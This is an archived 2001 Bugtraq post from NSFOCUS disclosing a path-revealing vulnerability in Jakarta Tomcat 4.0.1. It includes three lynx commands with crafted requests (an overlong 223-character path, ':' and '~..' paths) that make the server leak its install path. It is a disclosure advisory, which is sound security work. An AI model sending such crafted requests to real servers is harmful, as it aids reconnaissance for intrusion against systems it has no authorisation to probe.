Home page logo

bugtraq logo Bugtraq mailing list archives

From: analysist <analysist () nsfocus com>
Date: Thu, 22 Nov 2001 17:32:20 +0800


It looks like jakarta-tomcat-4.0.1 has a path revealing vulnerability.
On submiting an unusually long request(more than 222 bites) or a special crafted request, we can
get the web server's install path.

How to produce it
$ lynx http://localhost:8080/`perl -e 'print "A" x 223'`.jsp
$ lynx http://localhost:8080/:/x.jsp
$ lynx http://localhost:8080/~../x.jsp

Tested version 
Jakarta Tomcat v4.0.1
    Microsoft Windows 2000

I sent this information to the vendor a week ago, but i have not received any reply!:( 

Best Regards

analysist () nsfocus com 
NSFOCUS Security Team <http://www.nsfocus.com>

  By Date           By Thread  

Current thread:
  • Hi analysist (Nov 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]